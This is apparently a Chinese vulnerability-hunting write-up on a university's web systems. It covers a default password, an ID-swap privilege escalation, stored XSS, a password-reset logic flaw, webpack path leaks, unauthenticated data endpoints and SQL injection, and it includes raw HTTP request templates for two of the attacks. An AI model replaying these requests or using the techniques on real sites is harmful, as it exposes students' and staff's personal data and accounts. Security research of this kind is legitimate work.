漏洞挖掘 | 某高校打包

本文由掌控安全学院 - 不知江月待何人 投稿

前言

最近在整理本地一些文档，某站Webpack打包，简单看看。

打点

目标站点太明显，一个语法直接出了 初始密码:*111111

有了初始密码就比较顺畅了，一路畅通~

水平越权

当前用户信息

报文

1. POST /gxxs/xsjbxx101/getByXhXsjbxxUserIdm.json HTTP/1.1
2. Host: xxx
3. User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:99.0) Gecko/20100101 Firefox/99.0
4. Accept: application/json, text/plain, /
5. Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
6. Content-Type: application/json;charset=utf-8
7. Content-Length: 42
8. Origin: xxx
9. Connection: close
10. Referer: xxx
11. Cookie: SESSION=109b2f59-595d-46a3-a338-61b1b30ab5cc; client_vpn_ticket=UyVHB6mRqnXpK0uB
12. Sec-Fetch-Dest: empty
13. Sec-Fetch-Mode: cors
14. Sec-Fetch-Site: same-origin
16. {"firstResult":null,"xhId":"201850240202"}
17. 修改xhld：值为201850240203
19. 水平越权查看学号：201850240203用户信息

存储xss

超管

功能点：网站后台管理
补充一下账号来源：在线用户接口提取

博达建站其实是通杀的，有机会再写这个通用

逻辑缺陷 任意重置

报文

1. POST /Home/PwdUpdate HTTP/1.1
2. Host: xxx
3. User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:99.0) Gecko/20100101 Firefox/99.0
4. Accept: /
5. Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
6. Content-Type: application/x-www-form-urlencoded; charset=UTF-8
7. X-Requested-With: XMLHttpRequest
8. Content-Length: 23
9. Origin: https://xxx
10. Connection: close
11. Referer: https://xxx
12. Cookie: client_vpn_ticket=d408aVETr3IzQYPA; TencentMailUserId=xxx; TencentMailUserType=1
13. Sec-Fetch-Dest: empty
14. Sec-Fetch-Mode: cors
15. Sec-Fetch-Site: same-origin
17. userpwd=cduUBj4snUiaJWW

ticket这个参数不用管，重点是userid
验证

弱口令打包

302跳的是成功

x论文系统

配合前文逻辑使用，可以随便下别人论文？？？

逻辑缺陷

当前用户信息：周女士

Webpack泄露，拼路径
vue/manager/#/index/homeTransfer/IDM
6w条

逻辑缺陷

逻辑缺陷

敏感泄露

index/homeTransfer/gxxs01

未授权

需要卡包，302

这个图打码太多，不放了。用户数据图
控制参数pagsize可列用户信息

未授权

同上，卡302跳包

教职工接口

SQL

太多了，写不完…

申明：本公众号所分享内容仅用于网络安全技术讨论，切勿用于违法途径，

所有渗透都需获取授权，违者后果自行承担，与本号及作者无关，请谨记守法.

原文始发于微信公众号（掌控安全EDU）：漏洞挖掘 | 某高校打包